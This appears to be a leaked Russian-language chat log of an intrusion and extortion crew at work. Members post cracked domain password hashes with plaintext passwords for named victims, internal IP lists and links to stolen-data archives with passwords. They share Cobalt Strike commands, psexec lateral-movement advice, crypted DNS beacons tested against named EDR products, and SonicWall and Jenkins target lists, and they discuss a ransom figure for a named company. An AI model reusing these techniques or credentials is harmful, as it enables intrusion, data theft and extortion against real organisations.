[2024-03-02 00:26:42] @username777:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> `Sys.Sam.Wineinger::NUMOTION:b60fcf16974d2ab446466ff95c7319edef8a074c8c812dc7:b60fcf16974d2ab446466ff95c7319edef8a074c8c812dc7:1122334455667788`

`Sys.Sam.Wineinger::NUMOTION:b60fcf16974d2ab446466ff95c7319edef8a074c8c812dc7:b60fcf16974d2ab446466ff95c7319edef8a074c8c812dc7:1122334455667788:Plumbus1983!`

--------------------
[2024-03-02 00:32:21] @usernamenn:matrix.bestflowers247.online: > <@usernamenn:matrix.bestflowers247.online> Крипт битый, не запускается файл в общем

Все Ок, просто не приходило много с чего. Но есть детект Сентинела
--------------------
[2024-03-02 00:32:31] @usernamenn:matrix.bestflowers247.online: X 2024-03-02 в 03.33.33.jpg
--------------------
[2024-03-02 02:17:26] @usernamenn:matrix.bestflowers247.online: https://github.com/trustedsec/CS-Situational-Awareness-BOF
--------------------
[2024-03-02 02:18:07] @usernamenn:matrix.bestflowers247.online: Качайте в ZIP архиве, распаковываете
--------------------
[2024-03-02 02:18:48] @usernamenn:matrix.bestflowers247.online: в кобе добавляете в скрипт менеджере cna которая находится в папке `/SA/SA.cna`
--------------------
[2024-03-02 02:19:22] @usernamenn:matrix.bestflowers247.online: команда что бы узнать policy траста

get_password_policy domain.local
или
get_password_policy dc.domain.local
--------------------
[2024-03-02 02:24:28] @usernamenn:matrix.bestflowers247.online: Запомните, прям запомните иначе потом опять будете спрашивать. ПРОЧИТАЙТЕ что бы потом не говорили что я не слышал, не видел, не знал, забыл.
--------------------
[2024-03-02 02:25:13] @usernamenn:matrix.bestflowers247.online: X 2024-03-02 в 05.27.08.jpg
--------------------
[2024-03-02 02:26:11] @usernamenn:matrix.bestflowers247.online: Все надеюсь помнят эту ошибку которая выдается после того как вы пытаетесь прочитать Windows XP или 2003 Server, это связано что на ВАШЕЙ (НАШЕЙ) стороне нет поддержки SMB v1 протокола, по этому мы не можем читать, уж тем более звать это старое дерьмо.
--------------------
[2024-03-02 02:27:11] @usernamenn:matrix.bestflowers247.online: Дак вот я понял что это была проблема на нашей стороне всегда и что бы проверить поддерживает ли наша тачка SMB v1, нужно ввести команду:

`shell sc.exe qc lanmanworkstation`
--------------------
[2024-03-02 02:27:31] @usernamenn:matrix.bestflowers247.online: X 2024-03-02 в 05.29.26.jpg
--------------------
[2024-03-02 02:27:50] @usernamenn:matrix.bestflowers247.online: MRxSmb10 - указывает на то что у нас есть поддержка SMBv1, и мы можем читать это дерьмо.
--------------------
[2024-03-02 02:28:13] @usernamenn:matrix.bestflowers247.online: X 2024-03-02 в 05.30.08.jpg
--------------------
[2024-03-02 02:28:32] @usernamenn:matrix.bestflowers247.online: На этом скрине мы не видим MRxSmb10, значит прочитать старое дерьмо обернется хуем за щеку
--------------------
[2024-03-02 02:28:59] @usernamenn:matrix.bestflowers247.online: * На этом скрине мы не видим MRxSmb10, значит прочитать старое дерьмо не получится.
--------------------
[2024-03-02 02:30:41] @usernamenn:matrix.bestflowers247.online: На вопрос, "А что теперь если мы будем проверять и найдем ту самую которая будет поддерживать SMBv1, мы можем теперь джампаться на нее, или как то звать, ДА можно. Джампы psexec при условии того что там нет АВ, tasklist как правило удаленный на это дерьмо не работает, если только в слепую чего не рекомендую. Звать можно через remote-exec x86 файлом криптованным который будет проверен на запуск на нашей XP или Server, где его достать, не ебу.
--------------------
[2024-03-02 02:31:15] @usernamenn:matrix.bestflowers247.online: Надеюсь все популярно и доходчиво объяснил ...
--------------------
[2024-03-02 02:31:18] @usernamenn:matrix.bestflowers247.online: 🐇
--------------------
[2024-03-02 02:31:36] @usernamenn:matrix.bestflowers247.online: * На вопрос 🐰, "А что теперь если мы будем проверять и найдем ту самую которая будет поддерживать SMBv1, мы можем теперь джампаться на нее, или как то звать, ДА можно. Джампы psexec при условии того что там нет АВ, tasklist как правило удаленный на это дерьмо не работает, если только в слепую чего не рекомендую. Звать можно через remote-exec x86 файлом криптованным который будет проверен на запуск на нашей XP или Server, где его достать, не ебу.
--------------------
[2024-03-02 02:32:00] @usernamenn:matrix.bestflowers247.online: * На вопрос 🐰, "А что теперь если мы будем проверять и найдем ту самую которая будет поддерживать SMBv1, мы можем теперь джампаться на нее, или как то звать, ДА можно. Джампы psexec при условии того что там нет EDR, tasklist как правило удаленный на это дерьмо не работает, если только в слепую чего не рекомендую. Звать можно через remote-exec x86 файлом криптованным который будет проверен на запуск на нашей XP или Server, где его достать, не ебу.
--------------------
[2024-03-02 02:32:13] @usernamenn:matrix.bestflowers247.online: * На вопрос 🐰, "А что теперь если мы будем проверять и найдем ту самую которая будет поддерживать SMBv1, мы можем теперь джампаться на нее, или как то звать, ДА можно. Джампы psexec при условии того что там нет EDR/XDR, tasklist как правило удаленный на это дерьмо не работает, если только в слепую чего не рекомендую. Звать можно через remote-exec x86 файлом криптованным который будет проверен на запуск на нашей XP или Server, где его достать, не ебу.
--------------------
[2024-03-02 02:33:20] @usernamenn:matrix.bestflowers247.online: 🐇 🐇 🐇
--------------------
[2024-03-02 02:33:24] @usernamenn:matrix.bestflowers247.online: 🐇
--------------------
[2024-03-02 02:33:30] @usernamenn:matrix.bestflowers247.online: 🐇 🐇 🐇
--------------------
[2024-03-02 02:33:34] @usernamenn:matrix.bestflowers247.online: 🐇
--------------------
[2024-03-02 02:33:37] @usernamenn:matrix.bestflowers247.online: 🐇
--------------------
[2024-03-02 02:34:01] @usernamenn:matrix.bestflowers247.online: * **------------ PRESS**
--------------------
[2024-03-02 02:35:58] @usernamenn:matrix.bestflowers247.online: * MRxSmb10 - указывает на то что у нас есть поддержка SMBv1, и мы можем читать это дерьмо. (Походу 2008 сервера все или почти все имеют поддержку SMBv1)
--------------------
[2024-03-02 03:27:47] @usernamess:matrix.bestflowers247.online: > <@username777:matrix.bestflowers247.online> `Sys.Sam.Wineinger::NUMOTION:b60fcf16974d2ab446466ff95c7319edef8a074c8c812dc7:b60fcf16974d2ab446466ff95c7319edef8a074c8c812dc7:1122334455667788:Plumbus1983!`

++
--------------------
[2024-03-02 05:02:54] @usernamemm:matrix.bestflowers247.online: > <@usernameboy:matrix.bestflowers247.online> `$DCC2$10240#ldap#f03f50c7e247efbcdff9a8e305a40bd7:Aa11Bb22Cc33Dd44Ee55`

++
--------------------
[2024-03-02 05:10:19] @usernamess:matrix.bestflowers247.online: 185.219.221.136:39599
--------------------
[2024-03-02 05:11:07] @usernamess:matrix.bestflowers247.online: 185.219.221.136:38001
--------------------
[2024-03-02 05:26:47] @usernamett:matrix.bestflowers247.online: `64.176.219.106:33363  OTRWHEEL FIZ`
--------------------
[2024-03-02 05:28:35] @usernamett:matrix.bestflowers247.online: `64.176.219.106:42395  OTRWHEEL FIZ`
--------------------
[2024-03-02 05:42:51] @usernamess:matrix.bestflowers247.online: На второй сетке, что я ночью раскрутил, слишком много даты и я хз нужно ли ее ставить на папру часов пока мы будем ставить сетку одну
--------------------
[2024-03-02 05:43:39] @usernamess:matrix.bestflowers247.online: а если поставим качать то хз сколько выкачает и ждать до вечера вдруг выпилять нас
--------------------
[2024-03-02 05:43:41] @usernamess:matrix.bestflowers247.online: диллема
--------------------
[2024-03-02 05:59:30] @usernamess:matrix.bestflowers247.online: 185.219.221.136:33887 numotion
--------------------
[2024-03-02 06:37:15] @usernamegg:matrix.bestflowers247.online: ща
--------------------
[2024-03-02 06:45:31] @usernamess:matrix.bestflowers247.online: ```
10.50.16.193
10.50.16.49
10.50.32.51
10.50.11.6
10.50.11.9
10.50.32.172
10.50.32.174
10.50.32.173
10.50.32.80
10.50.32.101
10.50.32.82
10.50.32.81
10.50.32.30
10.12.1.4
```

--------------------
[2024-03-02 06:57:29] @usernamecc:matrix.bestflowers247.online: ```
NAS_tree.txt
http://temp.sh/ymhdf/TB6PcaU2Nrnfm7wyEvKkpQsFJ4VhXD.zip
TB6PcaU2Nrnfm7wyEvKkpQsFJ4VhXD.zip
extract pass : dZvRaX6qJ8BFSGYtszw4rngAxL3QcD
```
--------------------
[2024-03-02 07:16:12] @usernamegg:matrix.bestflowers247.online: https://pixeldrain.com/u/KYszpJNh
--------------------
[2024-03-02 07:16:18] @usernamegg:matrix.bestflowers247.online: еще по доменом собралось
--------------------
[2024-03-02 07:19:56] @usernamegg:matrix.bestflowers247.online: fpdcompany
--------------------
[2024-03-02 07:19:58] @usernamegg:matrix.bestflowers247.online: ответь
--------------------
[2024-03-02 07:37:51] @usernamenn:matrix.bestflowers247.online: 🐇🐇🐇🐇🐇
--------------------
[2024-03-02 09:20:06] @usernamenn:matrix.bestflowers247.online: ```
[SMB] NTLMv1 Client   : 71.245.64.74
[SMB] NTLMv1 Username : EDWARDS\ASFSRV02$
[SMB] NTLMv1 Hash     : ASFSRV02$::EDWARDS:9D0BA9DE0F5E7A6923AEF18D7CD1E61320B3F5E8FF7BFDFC:9D0BA9DE0F5E7A6923AEF18D7CD1E61320B3F5E8FF7BFDFC:1122334455667788
```
--------------------
[2024-03-02 12:13:43] @usernamenn:matrix.bestflowers247.online: burrito: нет желания накатить XP & 2003 потестить билды?
--------------------
[2024-03-02 13:06:18] @burito:matrix.bestflowers247.online: > <@usernamenn:matrix.bestflowers247.online> burrito: нет желания накатить XP & 2003 потестить билды?

Мой крипт под хр не будет работать, разве что единичный случай это вручную запустить как писал выше
--------------------
[2024-03-02 13:06:51] @burito:matrix.bestflowers247.online: Для хр надо многое урезать, что для крипта критично
--------------------
[2024-03-02 14:44:48] @usernamegg:matrix.bestflowers247.online: [22:30:00] vns10k -выгружает хосты шодан,: jenkins fofa & shodan https://transfer.sh/L3JHK1We5D/jenkins_shodan&fofa.tar.gz
[pending] : 2024-03-02
[02:39:53] vns10k -выгружает хосты шодан,: sonicwall fofa https://transfer.sh/GB45dLdT1Q/sonicwall_fofa.tar.gz
[15:18:09] vns10k -выгружает хосты шодан,: sonicwall shodan https://transfer.sh/kEaPtf0f9O/sonicwall_shodan.tar.gz
[16:27:52] vns10k -выгружает хосты шодан,: jenkins us zoomeye https://transfer.sh/HRo2Rh3vel/Jenkins_US_zoomeye.tar.gz
[16:28:31] vns10k -выгружает хосты шодан,: sonicwall us zoomeye https://transfer.sh/cq1FSil1VD/sonicwall_us_zoomeye.tar.gz
--------------------
[2024-03-02 15:08:54] @cob_crypt_ward:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> делает бентли

привет, удалось сделать в итоге?
--------------------
[2024-03-02 17:46:53] @tinker:matrix.bestflowers247.online: Привет, разжевал для них всё
--------------------
[2024-03-02 17:50:15] @tinker:matrix.bestflowers247.online: мне нужна твоя ценовая политика по anthemproperties.com - они предлагают 400к, и, в целом, судя по их финансам, это их потолок. Не забывай, что в годовой доход очень часто считаются конраткты заключённые в этот год на всю протяжённость. То есть, если они подписали поставку компании А на миллион долларов на пять лет - этот миллион будет засчитан в годовой доход одного года. Поэтому далеко не всегда большой доход = большим деньгам. В принципе, для компании их размера, полмиллионная инвестиция это скорее всего потолок, даже с учётом всех dept fundings
--------------------
[2024-03-02 18:11:10] @usernamenn:matrix.bestflowers247.online: Ясно, хуево чё
--------------------
[2024-03-02 19:45:10] @adm:talks.icu: и как ?
--------------------
[2024-03-02 20:03:17] @usernamegg:matrix.bestflowers247.online: ну давай их поднимем по макс
--------------------
[2024-03-02 20:14:39] @usernamenn:matrix.bestflowers247.online: ку
--------------------
[2024-03-02 20:21:08] @usernamegg:matrix.bestflowers247.online: куку
--------------------
[2024-03-02 20:21:40] @usernamenn:matrix.bestflowers247.online: приедешь?
--------------------
[2024-03-02 20:21:59] @usernamenn:matrix.bestflowers247.online: я GOAD ставлю для теста поеботины с NTLMv1
--------------------
[2024-03-02 22:57:34] @burito:matrix.bestflowers247.online: > <@usernamenn:matrix.bestflowers247.online> burrito: нет желания накатить XP & 2003 потестить билды?

щас скину пару вариантов
--------------------
[2024-03-02 22:58:38] @usernamenn:matrix.bestflowers247.online: > <@burito:matrix.bestflowers247.online> щас скину пару вариантов

Ok
--------------------
[2024-03-02 23:06:46] @burito:matrix.bestflowers247.online: rundll32.exe dll.dll,CloseNow
тестани эти
--------------------
[2024-03-02 23:06:47] @burito:matrix.bestflowers247.online: cob11_DNS_x86.rar
--------------------
[2024-03-02 23:21:36] @burito:matrix.bestflowers247.online: и еще два
--------------------
[2024-03-02 23:21:37] @burito:matrix.bestflowers247.online: cob11_DNS_x86_n.rar
--------------------
[2024-03-02 23:21:54] @usernamenn:matrix.bestflowers247.online: ебать вес)
--------------------
[2024-03-02 23:22:04] @usernamenn:matrix.bestflowers247.online: надо поставить Windows XP попробовать
--------------------
[2024-03-02 23:22:26] @usernamenn:matrix.bestflowers247.online: там где надо запустить там еще макафи стоит на одной, на остальных карбон или сентик
--------------------
[2024-03-02 23:22:49] @burito:matrix.bestflowers247.online: у меня на хр стартует
--------------------
[2024-03-02 23:23:00] @burito:matrix.bestflowers247.online: с ав надо тестить по месту уже
--------------------
[2024-03-02 23:23:35] @usernamenn:matrix.bestflowers247.online: аа ты затестил, щас проверю на EDR чеке что там по детекту
--------------------
[2024-03-02 23:31:20] @usernamenn:matrix.bestflowers247.online: [651E69468664310] Admin?
--------------------
[2024-03-02 23:31:22] @usernamenn:matrix.bestflowers247.online: твое?
--------------------
[2024-03-02 23:31:57] @burito:matrix.bestflowers247.online: на дедике запускал
--------------------
[2024-03-02 23:32:00] @burito:matrix.bestflowers247.online: может
--------------------
[2024-03-02 23:32:13] @usernamenn:matrix.bestflowers247.online: Ok
--------------------
[2024-03-02 23:45:14] @burito:matrix.bestflowers247.online: > <@usernamenn:matrix.bestflowers247.online> Ok

ну как?
--------------------
[2024-03-02 23:45:27] @usernamenn:matrix.bestflowers247.online: по DNS заливаю файл хули)
--------------------
[2024-03-02 23:45:35] @usernamenn:matrix.bestflowers247.online: там 2000 винда как оказалось
--------------------
[2024-03-02 23:45:38] @usernamenn:matrix.bestflowers247.online: тоже самое же?
--------------------
[2024-03-02 23:55:56] @burito:matrix.bestflowers247.online: да хз))
--------------------
[2024-03-02 23:56:04] @burito:matrix.bestflowers247.online: хорошо хоть не 95я
--------------------
[2024-03-02 23:56:15] @burito:matrix.bestflowers247.online: я на хр тестил
--------------------
[2024-03-02 23:56:29] @usernamenn:matrix.bestflowers247.online: попробую запустить
--------------------
[2024-03-02 23:56:33] @burito:matrix.bestflowers247.online: ок
--------------------
